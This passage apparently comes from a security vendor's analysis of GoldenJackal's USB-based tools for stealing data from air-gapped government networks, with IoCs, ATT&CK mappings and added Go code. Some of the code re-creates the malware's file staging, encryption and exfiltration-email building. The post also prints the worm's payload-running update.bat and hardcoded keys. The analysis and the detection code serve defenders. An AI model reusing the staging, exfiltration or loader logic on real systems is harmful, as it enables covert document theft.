A similar process is applied to files on the drive that meet the criteria for exfiltration: these files are archived together, preserving their directory structure, encrypted with AES, and added to outputCipherFilename. When selecting files for exfiltration, a list of SHA-256 hashes is retrieved from the registry. If the hash of a file is in that list, the file is not exfiltrated. If the hash isn't in the list, it is added, so that the file won't be exfiltrated again.

Whenever adding files to exfiltrate would exceed the maxZIPSize of outputCipherFilename, the excess files are not added to the archive for exfiltration, but their paths are added to a text file that is archived, encrypted, and added to outputCipherFilename.

Regarding encryption, each individual archive that is added to the encrypted container is encrypted with AES in CFB mode, with a key and an initialization vector (IV) that are randomly generated on the spot. Both the key and the IV need to be stored, but only the key is encrypted with RSAKey. Figure 7 shows an example of how these fields are stored in the encrypted container.

Figure 7. Structure of the encrypted container
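The selection and sealing logic described above, as an added Go example (this is not ESET's code and not GoldenUsbCopy's own source). The field names come from the configuration list; everything else is an assumption made to get a runnable round trip: the JSON field types, comparing raw file sizes against maxZIPSize instead of the archive size, marking only staged files as seen, and RSA-OAEP as the key-wrapping padding. The names Config, Candidate, Select, Entry, Seal and SampleRun are chosen here, and the candidate files are constructed.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"fmt"
	"path/filepath"
	"strings"
	"time"
)

// Config: the reports.ini fields that drive selection (names from the blog; types assumed).
type Config struct {
	LastDate       int      `json:"lastDate"`
	MaxZIPSize     int64    `json:"maxZIPSize"`
	MaxFileSize    int64    `json:"maxFileSize"`
	ExtensionsFile []string `json:"extensionsFile"`
}

// Candidate stands in for one file found on a newly inserted drive (constructed input).
type Candidate struct {
	Path    string
	Size    int64
	ModTime time.Time
	Data    []byte
}

// Select applies the described criteria: extension list, maxFileSize, lastDate, then the
// SHA-256 dedup list kept under registryKey/registryValue. Files that would push the staged
// total past maxZIPSize are not staged; their paths are returned for the text listing.
// Assumptions: raw sizes stand in for archive size; only staged files are marked as seen.
func Select(cfg Config, now time.Time, seen map[[32]byte]bool, files []Candidate) (staged []Candidate, overflow []string) {
	allowed := map[string]bool{}
	for _, e := range cfg.ExtensionsFile {
		allowed[strings.ToLower(e)] = true
	}
	var total int64
	for _, f := range files {
		if !allowed[strings.ToLower(filepath.Ext(f.Path))] || f.Size > cfg.MaxFileSize ||
			now.Sub(f.ModTime) > time.Duration(cfg.LastDate)*24*time.Hour {
			continue
		}
		h := sha256.Sum256(f.Data)
		if seen[h] {
			continue
		}
		if total+f.Size > cfg.MaxZIPSize {
			overflow = append(overflow, f.Path)
			continue
		}
		seen[h], total = true, total+f.Size
		staged = append(staged, f)
	}
	return staged, overflow
}

// Entry: IV in the clear, per-entry AES key wrapped with RSAKey, AES-CFB ciphertext.
// Figure 7's byte layout is not published, so this struct is illustrative only.
type Entry struct{ IV, WrappedKey, Ciphertext []byte }

// Seal: fresh random 32-byte key and 16-byte IV, AES-CFB, key wrapped with RSA (OAEP assumed).
func Seal(pub *rsa.PublicKey, plaintext []byte) (Entry, error) {
	kiv := make([]byte, 32+aes.BlockSize)
	if _, err := rand.Read(kiv); err != nil {
		return Entry{}, err
	}
	key, iv := kiv[:32], kiv[32:]
	block, err := aes.NewCipher(key)
	if err != nil {
		return Entry{}, err
	}
	ct := make([]byte, len(plaintext))
	cipher.NewCFBEncrypter(block, iv).XORKeyStream(ct, plaintext)
	wrapped, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, pub, key, nil)
	return Entry{IV: iv, WrappedKey: wrapped, Ciphertext: ct}, err
}

// SampleRun feeds constructed candidates through Select (one too old, one duplicate, one
// that overflows maxZIPSize) and seals the survivors with a throwaway RSA key.
func SampleRun() (staged, overflow int, err error) {
	cfg := Config{LastDate: 30, MaxZIPSize: 1500, MaxFileSize: 1 << 20,
		ExtensionsFile: []string{".docx", ".pdf", ".doc", ".odt"}}
	now := time.Date(2024, 3, 1, 0, 0, 0, 0, time.UTC)
	files := []Candidate{
		{`E:\cables\memo.docx`, 1000, now.AddDate(0, 0, -2), []byte("memo")},
		{`E:\old\budget.pdf`, 900, now.AddDate(0, 0, -90), []byte("budget")},
		{`E:\drafts\talking-points.odt`, 800, now.AddDate(0, 0, -1), []byte("tp")},
		{`E:\copy\memo.docx`, 1000, now, []byte("memo")},
	}
	s, o := Select(cfg, now, map[[32]byte]bool{}, files)
	priv, err := rsa.GenerateKey(rand.Reader, 2048)
	for i := 0; err == nil && i < len(s); i++ {
		_, err = Seal(&priv.PublicKey, s[i].Data)
	}
	return len(s), len(o), err
}

func main() { fmt.Println(SampleRun()) }
```

The point for a defender is the dedup list: because hashes are tracked, re-inserting the same drive produces no new staged data, so a honeyfile planted to catch this component has to change content between insertions to be picked up again. The per-entry key wrapped with the operator's public key also means a recovered container cannot be opened without the private key, which is why the GoldenUsbGo variant with its static key is the one worth attempting to decrypt.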

GoldenUsbGo

This component is very similar to GoldenUsbCopy and seems to be a later version of it, based on when we observed them in our telemetry and on the Go versions used to compile them. However, GoldenUsbGo achieves the same functionality with a simpler implementation:

  • There is no configuration file. All criteria for file selection are hardcoded in the malware:
    • if the filename contains a specific word from a list, the file is processed regardless of all other criteria (the list contains strings such as pass, login, and key),
    • otherwise, the file size must be no bigger than 20 MB,
    • the date the file was last modified must be no more than 14 days ago, and
    • the file extension must be one of .pdf, .doc, .docx, .sh, or .bat.
  • Insertion of removable drives is not continuously monitored. A hardcoded list of drive letters is checked periodically to find out whether D:, E:, F:, G:, or H: has an assigned volume.
  • The list of hashes of files that were already processed is kept in memory only.
  • There is no size limit for the encrypted container where files are staged for exfiltration.
  • Files are not archived but instead are compressed with gzip. Both file contents and filenames are compressed. Figure 8 shows how compressed data is arranged before encryption.

Figure 8. Fields used for gzip-compressed files, before encryption

The path to the encrypted container is hardcoded in the malware:

C:\Users\[redacted]\appdata\local\SquirrelTemp\SquirrelCache.dat

The hardcoded username in the path, redacted above, along with the short list of drives and the specific filenames to process, tell us that GoldenUsbGo was compiled and tailored for this particular victim.

Compressed files are encrypted with AES in CFB mode with the hardcoded key Fn$@-fR_*+!13bN5. The structure is the same as in GoldenUsbCopy (shown in Figure 7) but without the AES key. After compressing the files, GoldenUsbGo generates a listing of all files on the inserted drive and adds it to the encrypted container, in the same manner as the exfiltrated files. The filename for the listing is formed from the current date and time, replacing : with - (for example, 15 Jan 24 13-21 PST).
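An added Go example, not GoldenUsbGo's code, showing what the static key makes possible for an analyst. The only facts taken from the page are the 16-byte (AES-128) key, CFB mode, gzip compression of both filename and contents, and an IV stored without a wrapped key. The record framing (length-prefixed fields; IV, then length, then ciphertext) and the names EncodeEntry and DecodeEntries are assumptions chosen to make the round trip runnable; a real SquirrelCache.dat may lay the fields out differently, so treat DecodeEntries as a starting point for triage, not as a decoder for the actual sample.

```go
package main

import (
	"bytes"
	"compress/gzip"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"encoding/binary"
	"fmt"
	"io"
)

// Key is the 16-byte (AES-128) key the blogpost reports as hardcoded in GoldenUsbGo.
const Key = "Fn$@-fR_*+!13bN5"

// Framing used here is an ASSUMPTION (Figure 8 is not reproduced): every field is a 4-byte
// big-endian length plus gzip stream; a record is [16-byte IV][4-byte length][CFB ciphertext].

func putGz(buf *bytes.Buffer, b []byte) {
	var z bytes.Buffer
	w := gzip.NewWriter(&z)
	w.Write(b)
	w.Close()
	binary.Write(buf, binary.BigEndian, uint32(z.Len()))
	buf.Write(z.Bytes())
}

// getField reads one length-prefixed field, refusing lengths that run past the input.
func getField(r *bytes.Reader) ([]byte, error) {
	var n uint32
	if err := binary.Read(r, binary.BigEndian, &n); err != nil || uint32(r.Len()) < n {
		return nil, io.ErrUnexpectedEOF
	}
	b := make([]byte, n)
	io.ReadFull(r, b)
	return b, nil
}

// gunzipField inflates one field; with a wrong key the gzip magic fails, a useful key check.
func gunzipField(r *bytes.Reader) ([]byte, error) {
	z, err := getField(r)
	if err != nil {
		return nil, err
	}
	gr, err := gzip.NewReader(bytes.NewReader(z))
	if err != nil {
		return nil, err
	}
	return io.ReadAll(gr)
}

// EncodeEntry stages one file as described: gzip name and contents, AES-128-CFB, IV in the clear.
func EncodeEntry(name string, contents []byte) ([]byte, error) {
	var plain bytes.Buffer
	putGz(&plain, []byte(name))
	putGz(&plain, contents)
	block, _ := aes.NewCipher([]byte(Key)) // 16-byte constant key: cannot fail
	iv := make([]byte, aes.BlockSize)
	if _, err := rand.Read(iv); err != nil {
		return nil, err
	}
	ct := make([]byte, plain.Len())
	cipher.NewCFBEncrypter(block, iv).XORKeyStream(ct, plain.Bytes())
	out := bytes.NewBuffer(iv)
	binary.Write(out, binary.BigEndian, uint32(len(ct)))
	out.Write(ct)
	return out.Bytes(), nil
}

// DecodeEntries walks a container such as a recovered SquirrelCache.dat and returns the
// staged files by name; the static key is what makes this feasible, unlike GoldenUsbCopy.
func DecodeEntries(container []byte) (map[string][]byte, error) {
	block, _ := aes.NewCipher([]byte(Key))
	out := map[string][]byte{}
	r := bytes.NewReader(container)
	for r.Len() > 0 {
		iv := make([]byte, aes.BlockSize)
		if _, err := io.ReadFull(r, iv); err != nil {
			return out, err
		}
		ct, err := getField(r)
		if err != nil {
			return out, err
		}
		cipher.NewCFBDecrypter(block, iv).XORKeyStream(ct, ct) // decrypt in place
		pr := bytes.NewReader(ct)
		name, err1 := gunzipField(pr)
		data, err2 := gunzipField(pr)
		if err1 != nil || err2 != nil {
			return out, fmt.Errorf("bad record (wrong key or layout?): %v %v", err1, err2)
		}
		out[string(name)] = data
	}
	return out, nil
}

func main() {
	rec, _ := EncodeEntry(`E:\passwords.txt`, []byte("admin:hunter2")) // "pass" keyword hit
	fmt.Println(DecodeEntries(rec))
}
```

If a decode attempt on a real container fails at the gzip step, the layout guess is wrong rather than the key: CFB decryption with the right key yields a gzip header (1f 8b) at the start of the name field, so scanning the decrypted bytes for that magic is a quick way to recover the true field offsets before adjusting the framing.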

GoldenAce

This component, which we classified as a distribution tool in Figure 5, serves to propagate other malicious executables and retrieve staged files via USB drives. While it could be used to target air-gapped systems, it's not specifically built for that, as opposed to GoldenDealer. It works together with a lightweight version of JackalWorm and some other unknown component.

GoldenAce periodically checks the drives in the list G:, H:, I:, J:, K:, L:, M:, N:, P:, X:, Y:, and Z:, to find one that is mapped to a volume. Then it checks whether a trash directory exists in the root of that drive. If it doesn't exist, it is created as hidden, and a file called update is copied to that directory, from the same location where GoldenAce is running. The first directory on the drive (in alphabetical order) that is not hidden is set to hidden, and a file called upgrade is copied to the root of the drive and renamed as <name_of_hidden_directory>.exe.

The file upgrade is actually JackalWorm, an executable that uses a folder icon, and whose purpose is to copy and run the update file on another system where the USB drive is inserted. Unlike the version of JackalWorm described by Kaspersky, this one is very limited: it has no code to monitor drive insertions, and it cannot be configured to perform various actions. When executed from the root directory of a removable drive, it opens the hidden folder in Windows Explorer and writes a batch file to execute the payload in update. The contents of this file, update.bat, are shown in Figure 9.

@echo off
copy "<drive_letter>:\\trash\\update" "C:\\Users\\%username%\\AppData\\Local\\update.exe"
"C:\\Users\\%username%\\AppData\\Local\\update.exe" "<drive_letter>:\\trash"
:check1
@tasklist | findstr /i /b "update.exe" >nul
@if %errorlevel%==0 goto check1
@del /f /q /a h "C:\\Users\\%username%\\AppData\\Local\\update.exe"
@del /f /q "C:\\Users\\<username>\\AppData\\Local\\update.bat"

Figure 9. Contents of update.bat

We can see that update is run and then deleted, along with the batch file, once it has finished running (the :check1 loop polls tasklist until update.exe is no longer listed). While we didn't observe the contents of the update component, it is likely that it collects files and stages them in the trash directory on the removable drive, since the path to that directory is passed as an argument to update.

When GoldenAce finds that the directory trash already exists on a drive, instead of copying files to the drive, it copies the files in the trash directory to C:\ProgramData\Microsoft\Windows\DeviceMetadataCache.
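The on-disk pattern GoldenAce and this JackalWorm variant leave on a removable drive is specific enough to hunt for. The following Go example is added here (it is not ESET's code and not a tool from the toolset) and turns the description above into a check over a drive-root listing: a hidden trash directory holding update, and a root executable whose name matches a directory that was set to hidden beside it. RootEntry, Inspect and SampleDrive are names chosen here, the listing is constructed, and the Hidden flag is passed in rather than read from the file system so the check runs anywhere.

```go
package main

import (
	"fmt"
	"strings"
)

// RootEntry is one item in the root directory of a removable drive. Hidden stands for
// FILE_ATTRIBUTE_HIDDEN; a real scanner on Windows would fill it from syscall.GetFileAttributes.
type RootEntry struct {
	Name   string
	IsDir  bool
	Hidden bool
}

// Inspect applies the GoldenAce/JackalWorm layout the blogpost describes to one drive root:
// a hidden "trash" directory (holding the "update" payload) and a root executable named after
// a directory that was set to hidden next to it, i.e. the "<hidden_dir>.exe" folder-icon lure.
// trashContents lists the names inside trash if that directory exists.
func Inspect(root []RootEntry, trashContents []string) []string {
	var reasons []string
	hiddenDirs := map[string]bool{}
	for _, e := range root {
		if e.IsDir && e.Hidden {
			hiddenDirs[strings.ToLower(e.Name)] = true
		}
	}
	if hiddenDirs["trash"] {
		reasons = append(reasons, "hidden trash directory at drive root")
		for _, n := range trashContents {
			if strings.EqualFold(n, "update") {
				reasons = append(reasons, "trash\\update payload present")
			}
		}
	}
	for _, e := range root {
		lower := strings.ToLower(e.Name)
		if e.IsDir || !strings.HasSuffix(lower, ".exe") {
			continue
		}
		if base := strings.TrimSuffix(lower, ".exe"); hiddenDirs[base] {
			reasons = append(reasons, "root executable "+e.Name+" shadows hidden directory "+base)
		}
	}
	return reasons
}

// SampleDrive is a constructed listing shaped like the one GoldenAce leaves behind: "Reports"
// was the first non-hidden directory, so it is now hidden and Reports.exe sits beside it.
func SampleDrive() ([]RootEntry, []string) {
	root := []RootEntry{
		{Name: "trash", IsDir: true, Hidden: true},
		{Name: "Reports", IsDir: true, Hidden: true},
		{Name: "Reports.exe"},
		{Name: "Vacation", IsDir: true},
	}
	return root, []string{"update"}
}

func main() {
	for _, r := range Inspect(SampleDrive()) {
		fmt.Println("suspicious:", r)
	}
}
```

The second check matters on its own: a hidden directory and an .exe of the same name at the root of a removable drive is the classic folder-icon lure, and it is exactly what a user sees as "the folder" when hidden items are not shown. On a Windows host the drive letters to walk are the ones from the list above, and the listing can be produced with os.ReadDir plus the hidden attribute per entry.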

HTTP server

We observed Python's HTTP server, packaged with PyInstaller, being executed via C:\Windows\system32\cmd.exe /K C:\Windows\msahci.cmd. Unfortunately, we didn't observe the contents of the msahci.cmd file, so we don't know the arguments passed for execution, such as the port for the server to listen on.

GoldenBlacklist

As a processing component, GoldenBlacklist downloads an encrypted archive from a local server and processes the email messages contained in it, keeping only those of interest. It then generates a new archive for some other component to exfiltrate.

The URL to retrieve the initial archive is hardcoded: https://<local_ip_address>/update46.zip. The downloaded file is saved as res.out and AES decrypted with the hardcoded key k9ksbu9Q34HBKJuzHIuGTfHL9xCzMl53vguheOYA8SiNoh6Jqe62F7APtQ9pE, using a legitimate OpenSSL executable.

The decrypted archive, update46.tar.gz, is extracted in memory, and only those files that match certain criteria are written to a subdirectory tmp, in the directory where the malware is running. The criteria are:

  • The file does not contain any email address from a blocklist of email addresses. This is done to remove email messages that come from senders that usually are not interesting. While we can't include the full list here, it's worth mentioning that many of the email addresses are related to newsletters and press releases. It's important to note that the attackers must have been operating for some time to build a list like this.
  • The file contains the string Content-Type: application. This is to keep email messages that have attachments, such as PDF files, Microsoft Office files, and archives, to name a few.

Once the files are selected, GoldenBlacklist archives the tmp directory and encrypts it with openssl.exe, using the same encryption key as the one used to decrypt the initial archive. The resulting file is archive.out. All intermediate files and folders are then deleted, as well as openssl.exe, libssl-3-x64.dll, and libcrypto-3-x64.dll, all located in the malware's directory. This indicates that another component that we didn't observe copied those legitimate binaries there in the first place.

GoldenPyBlacklist

GoldenPyBlacklist is a Python implementation of GoldenBlacklist. It was packaged with PyInstaller and the original name of the script is duplxer_black_list_for_external_use.py. Some differences from the other component are:

  • the initial archive is written as ress.out,
  • the decryption key is the same, except for a different first character,
  • the decrypted archive is extracted to the C:\Windows\System32\temp directory for processing,
  • one additional selection criterion is added, so that only filenames ending in .msg (files created with Microsoft Outlook) are processed,
  • files that do not meet the criteria are deleted,
  • the final archive is created with the 7-Zip archiver, and
  • the final encrypted file is named ArcSrvcUI.ter.
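The selection step shared by GoldenBlacklist and GoldenPyBlacklist, as an added Go example (not the group's code). It starts from an already decrypted update46.tar.gz held in memory, as the Go component does; the OpenSSL decryption step is left out because the page does not give the cipher or command line. Keep implements the two documented criteria, with requireMsg switching on the extra .msg rule of the Python variant; ExtractAndFilter, BuildSample and the sample messages are constructed here and are not real traffic.

```go
package main

import (
	"archive/tar"
	"bytes"
	"compress/gzip"
	"fmt"
	"io"
	"strings"
)

// Message is one file taken from update46.tar.gz, held in memory as the Go component does.
type Message struct {
	Name string
	Body []byte
}

// Keep implements the documented criteria: drop the file if it mentions any blocklisted
// address, keep it only if it carries "Content-Type: application" (an attachment).
// requireMsg adds GoldenPyBlacklist's extra rule that only filenames ending in .msg count.
func Keep(m Message, blocklist []string, requireMsg bool) bool {
	if requireMsg && !strings.HasSuffix(strings.ToLower(m.Name), ".msg") {
		return false
	}
	lower := strings.ToLower(string(m.Body))
	for _, addr := range blocklist {
		if strings.Contains(lower, strings.ToLower(addr)) {
			return false
		}
	}
	return strings.Contains(string(m.Body), "Content-Type: application")
}

// ExtractAndFilter unpacks a tar.gz from memory and returns the files that pass Keep,
// in archive order. It never touches disk, matching the described in-memory extraction.
func ExtractAndFilter(targz []byte, blocklist []string, requireMsg bool) ([]Message, error) {
	gr, err := gzip.NewReader(bytes.NewReader(targz))
	if err != nil {
		return nil, err
	}
	tr := tar.NewReader(gr)
	var kept []Message
	for {
		hdr, err := tr.Next()
		if err == io.EOF {
			return kept, nil
		}
		if err != nil {
			return kept, err
		}
		if hdr.Typeflag != tar.TypeReg {
			continue
		}
		body, err := io.ReadAll(tr)
		if err != nil {
			return kept, err
		}
		if m := (Message{Name: hdr.Name, Body: body}); Keep(m, blocklist, requireMsg) {
			kept = append(kept, m)
		}
	}
}

// BuildSample builds a small tar.gz of constructed messages (not real traffic): a newsletter
// with a PDF, a diplomatic mail with a DOCX, a plain-text mail, and a non-.msg file with a ZIP.
func BuildSample() []byte {
	msgs := []struct{ name, body string }{
		{"1.msg", "From: press@newsletter.example\r\nSubject: Weekly\r\nContent-Type: application/pdf\r\n\r\n..."},
		{"2.msg", "From: counsellor@embassy.example\r\nSubject: Re: visit\r\nContent-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.document\r\n\r\n..."},
		{"3.msg", "From: counsellor@embassy.example\r\nSubject: lunch?\r\nContent-Type: text/plain\r\n\r\nno attachment"},
		{"4.eml", "From: counsellor@embassy.example\r\nContent-Type: application/zip\r\n\r\n..."},
	}
	var buf bytes.Buffer
	gw := gzip.NewWriter(&buf)
	tw := tar.NewWriter(gw)
	for _, m := range msgs {
		tw.WriteHeader(&tar.Header{Name: m.name, Mode: 0o600, Size: int64(len(m.body)), Typeflag: tar.TypeReg})
		tw.Write([]byte(m.body))
	}
	tw.Close()
	gw.Close()
	return buf.Bytes()
}

func main() {
	kept, err := ExtractAndFilter(BuildSample(), []string{"press@newsletter.example"}, false)
	for _, m := range kept {
		fmt.Println("keep:", m.Name)
	}
	fmt.Println("err:", err)
}
```

Two properties of the filter are worth noting for detection engineering. The blocklist is a negative filter on sender addresses, so the surviving set is biased toward person-to-person mail with attachments, exactly the material a DLP rule on the exfiltration leg (GoldenMailer's SMTP traffic or GoldenDrive's uploads) should weight most heavily. And because the match is a plain substring on the whole message, a blocklisted address appearing anywhere in a quoted reply is enough to drop an otherwise interesting thread, a gap the operators evidently accepted.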

GoldenMailer

Classified as an exfiltration component, GoldenMailer exfiltrates files by sending emails with attachments to attacker-controlled accounts. It was written in Python and packaged with PyInstaller, and the original name of the script is send_to_hole.py. GoldenMailer connects to legitimate servers – either smtp-mail.outlook.com or smtp.office365.com – to send the email messages, using SMTP on port 587.

The configuration is read from a file, C:\ProgramData\Microsoft\Windows\Caches\cversions.ini, in the same directory where GoldenMailer is running. The configuration consists of the following five lines:

  • email address used to authenticate to the SMTP server, and used as both sender and destination address,
  • password used to authenticate to the SMTP server,
  • path to the directory with the archives to exfiltrate,
  • base filename (e.g., press.pdf) used for the archives to exfiltrate; these archives follow the naming convention <base_filename>.<three_digit_sequence_number>, and
  • number of files to exfiltrate.

We noticed that this configuration file was copied from another PC in the local network. Given that the configuration file indicates how many archives are available to be exfiltrated, we presume that these archives must also be copied over the network, separating the tasks of collection, distribution, and exfiltration. It is likely that the configuration file is generated by the component in charge of collecting files and creating archives for exfiltration, but we didn't observe that component.

Figure 10 shows an example of an email message sent by GoldenMailer. The subject has a typo: it reads Press realese. The body is very simple and reads: Daily News about Israel-Hamas war. These strings are hardcoded in the malware's binary. Only one attachment is sent per email; if there are many archives to exfiltrate, one email is sent for each.

Figure 10. Example of an email message used to exfiltrate files

The configuration files that we observed contained the following email addresses:

  • mariaalpane@outlook[.]com
  • katemarien087@outlook[.]com
  • spanosmitsotakis@outlook[.]com
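What a mail gateway actually sees from GoldenMailer, as an added Go example (this is not the Python script and not ESET's code). It parses the five-line configuration, enumerates the <base_filename>.<three_digit_sequence_number> attachment names, and renders one message per attachment with the hardcoded subject and body quoted above. Numbering from 001, application/octet-stream as the attachment type and the placeholder account in Sample are assumptions; the SMTP submission itself is not performed.

```go
package main

import (
	"bufio"
	"bytes"
	"encoding/base64"
	"fmt"
	"mime/multipart"
	"net/textproto"
	"strconv"
	"strings"
)

// MailerConfig mirrors the five lines of cversions.ini in the order the blogpost lists them.
type MailerConfig struct {
	Account, Password, Dir, BaseName string
	Count                            int
}

// ParseConfig reads the five-line file. A short file or a non-numeric count is an error.
func ParseConfig(raw string) (MailerConfig, error) {
	var lines []string
	sc := bufio.NewScanner(strings.NewReader(raw))
	for sc.Scan() {
		lines = append(lines, strings.TrimSpace(sc.Text()))
	}
	if len(lines) < 5 {
		return MailerConfig{}, fmt.Errorf("expected 5 lines, got %d", len(lines))
	}
	n, err := strconv.Atoi(lines[4])
	if err != nil {
		return MailerConfig{}, err
	}
	return MailerConfig{Account: lines[0], Password: lines[1], Dir: lines[2], BaseName: lines[3], Count: n}, nil
}

// AttachmentNames enumerates the archives GoldenMailer would send, one per email:
// <base_filename>.<three_digit_sequence_number>. Starting at 001 is an assumption.
func AttachmentNames(cfg MailerConfig) []string {
	names := make([]string, 0, cfg.Count)
	for i := 1; i <= cfg.Count; i++ {
		names = append(names, fmt.Sprintf("%s.%03d", cfg.BaseName, i))
	}
	return names
}

// BuildMessage renders one exfiltration email as described: sender equals recipient, the
// hardcoded subject (typo included) and body, exactly one attachment. It returns the raw
// bytes a mail gateway would see; the STARTTLS/SMTP submission on port 587 is not performed.
func BuildMessage(cfg MailerConfig, attName string, data []byte) ([]byte, error) {
	var buf bytes.Buffer
	mw := multipart.NewWriter(&buf)
	fmt.Fprintf(&buf, "From: %s\r\nTo: %s\r\nSubject: Press realese\r\nMIME-Version: 1.0\r\n", cfg.Account, cfg.Account)
	fmt.Fprintf(&buf, "Content-Type: multipart/mixed; boundary=%q\r\n\r\n", mw.Boundary())
	body, err := mw.CreatePart(textproto.MIMEHeader{"Content-Type": {"text/plain; charset=utf-8"}})
	if err != nil {
		return nil, err
	}
	body.Write([]byte("Daily News about Israel-Hamas war"))
	att, err := mw.CreatePart(textproto.MIMEHeader{
		"Content-Type":              {"application/octet-stream"},
		"Content-Transfer-Encoding": {"base64"},
		"Content-Disposition":       {fmt.Sprintf("attachment; filename=%q", attName)},
	})
	if err != nil {
		return nil, err
	}
	att.Write([]byte(base64.StdEncoding.EncodeToString(data)))
	if err := mw.Close(); err != nil {
		return nil, err
	}
	return buf.Bytes(), nil
}

// Sample is a constructed cversions.ini; the account and password are placeholders.
const Sample = "exfil.account@example.com\r\nhunter2\r\nC:\\ProgramData\\Microsoft\\Windows\\Caches\r\npress.pdf\r\n3\r\n"

func main() {
	cfg, err := ParseConfig(Sample)
	if err != nil {
		panic(err)
	}
	for _, name := range AttachmentNames(cfg) {
		msg, _ := BuildMessage(cfg, name, []byte("<archive bytes>"))
		fmt.Printf("--- %s (%d bytes)\n", name, len(msg))
	}
}
```

The rendered message points at two cheap detections for outbound mail: the sender and recipient are the same external mailbox, and the attachment name press.pdf.001 has a numeric suffix that does not match the claimed PDF base name, so a rule that compares the declared filename extension with the attachment's actual content type flags every one of these messages without needing the typo in the subject.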

GoldenDrive

As opposed to GoldenMailer, this component exfiltrates files by uploading them to Google Drive. The necessary credentials are found in two files, whose names are hardcoded in the malware: credentials.json, which contains fields such as client_id and client_secret, and token.json, with fields such as access_token and refresh_token. A reference to Google Drive's API and some code snippets in the Go programming language can be found here.

Similar to GoldenMailer, this component can upload only one file at a time. GoldenDrive is executed with an argument that provides the full path to the file to upload.

Conclusion

In this blogpost, we revealed two new toolsets used by the GoldenJackal APT group to target air-gapped systems of governmental organizations, including those in Europe. Common functionalities include the use of USB drives to steal confidential documents.

Managing to deploy two separate toolsets for breaching air-gapped networks in only five years shows that GoldenJackal is a sophisticated threat actor aware of the network segmentation used by its targets.

A comprehensive list of indicators of compromise (IoCs) can be found in our GitHub repository.

For any inquiries about our research published on WeLiveSecurity, please contact us at threatintel@eset.com.

ESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit the ESET Threat Intelligence page.

IoCs

Files

SHA-1  Filename  Detection  Description
DA9562F5268FA61D19648DFF9C6A57FB8AB7B0D7  winaero.exe  Win32/Agent.AGKQ  GoldenDealer.
5F12FFD272AABC0D5D611D18812A196A6EA2FAA9  1102720677  Python/Agent.ANA, Python/HackTool.Agent.W, Python/Riskware.LdapDump.A, Python/Riskware.Impacket.C  GoldenHowl.
6DE7894F1971FDC1DF8C4E4C2EDCC4F4489353B6  OfficeAutoComplete.exe  WinGo/Agent.AAO  GoldenRobo.
7CB7C3E98CAB2226F48BA956D3BE79C52AB62140  prinntfy.dll  WinGo/DataStealer.A  GoldenUsbCopy.
8F722EB29221C6EAEA9A96971D7FB78DAB2AD923  zUpdater.exe  WinGo/Spy.Agent.AH  GoldenUsbGo.
24FBCEC23E8B4B40FEA188132B0E4A90C65E3FFB  fc.exe  WinGo/DataStealer.C  GoldenAce.
A87CEB21EF88350707F278063D7701BDE0F8B6B7  upgrade  MSIL/Agent.WPJ  JackalWorm – simpler version.
9CBE8F7079DA75D738302D7DB7E97A92C4DE5B71  fp.exe  WinGo/Spy.Agent.CA  GoldenBlacklist.
9083431A738F031AC6E33F0E9133B3080F641D90  fp.exe  Python/TrojanDownloader.Agent.YO  GoldenPyBlacklist.
C830EFD843A233C170285B4844C5960BA8381979  cb.exe  Python/Agent.ALE  GoldenMailer.
F7192914E00DD0CE31DF0911C073F522967C6A97  GoogleUpdate.exe  WinGo/Agent.YH  GoldenDrive.
B2BAA5898505B32DF7FE0A7209FC0A8673726509  fp.exe  Python/Agent.ALF  Python HTTP server.

Network

IP  Domain  Hosting provider  First seen  Details 
83.24.9[.]124  N/A  Orange Polska Spolka Akcyjna  2019‑08‑09  Primary C&C server used by GoldenJackal in 2019. 
196.29.32[.]210  N/A  UTANDE  2019‑08‑09  Secondary C&C server used by GoldenJackal in 2019. 
N/A  assistance[.]uz  N/A  2019‑09‑25  Compromised website used to download malware. 
N/A  thehistore[.]com  N/A  2019‑09‑25  Compromised website used as a C&C server. 
N/A  xgraphic[.]ro  N/A  2019‑09‑25  Compromised website used as a C&C server. 

Email Addresses

  • mariaalpane@outlook[.]com
  • katemarien087@outlook[.]com
  • spanosmitsotakis@outlook[.]com

MITRE ATT&CK techniques

This table was built using version 15 of the MITRE ATT&CK framework.

Tactic  ID  Name  Description 
Resource Development  T1583.003  Acquire Infrastructure: Virtual Private Server  GoldenJackal probably acquired a VPS server to use as a secondary C&C server for the GoldenDealer malware. 
T1583.004  Acquire Infrastructure: Server  GoldenJackal probably acquired a server to use as the primary C&C server for the GoldenDealer malware. 
T1584.006  Compromise Infrastructure: Web Services  GoldenJackal has used compromised WordPress sites as C&C infrastructure for the JackalControl and JackalSteal malware. 
T1587.001  Develop Capabilities: Malware  GoldenJackal develops its own custom malware. 
T1585.003  Establish Accounts: Cloud Accounts  GoldenJackal has used Google Drive to store exfiltrated files and legitimate tools. 
T1588.002  Obtain Capabilities: Tool  GoldenJackal uses legitimate tools, such as Plink and PsExec, for post-compromise operations. 
Execution  T1059.001  Command and Scripting Interpreter: PowerShell  GoldenJackal executed PowerShell scripts to download the JackalControl malware from a compromised WordPress website. 
T1059.003  Command and Scripting Interpreter: Windows Command Shell  GoldenAce uses cmd.exe to run a batch script that executes other malicious components. 
T1059.006  Command and Scripting Interpreter: Python  GoldenHowl contains various malicious modules that are Python scripts. 
T1106  Native API  GoldenDealer can copy and run an executable file with the CreateProcessW API. 
T1569.002  System Services: Service Execution  GoldenDealer can run as a service. 
T1204.002  User Execution: Malicious File  JackalWorm uses a folder icon to lure a potential victim into launching it. 
Persistence  T1543.003  Create or Modify System Process: Windows Service  GoldenDealer creates the service NetDnsActivatorSharing to persist on a compromised system. 
T1547.001  Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder  If GoldenDealer fails to create a service for persistence, an entry in a Run registry key is created instead. 
T1053.005  Scheduled Task/Job: Scheduled Task  GoldenHowl creates the scheduled task Microsoft\Windows\Multimedia\SystemSoundsService2 for persistence. 
Defense Evasion  T1564.001  Hide Artifacts: Hidden Files and Directories  GoldenDealer modifies the registry so that hidden files and directories are not shown in Windows Explorer. GoldenDealer, GoldenAce, and JackalWorm create hidden folders on USB drives. 
T1070.004  Indicator Removal: File Deletion  GoldenAce deletes payloads after they are run. GoldenBlacklist and GoldenPyBlacklist delete intermediate files after the final archives are generated. 
T1036.005  Masquerading: Match Legitimate Name or Location  GoldenUsbCopy uses a legitimate Firefox directory, C:\Users\<username>\AppData\Roaming\Mozilla\Firefox\, to stage files. 
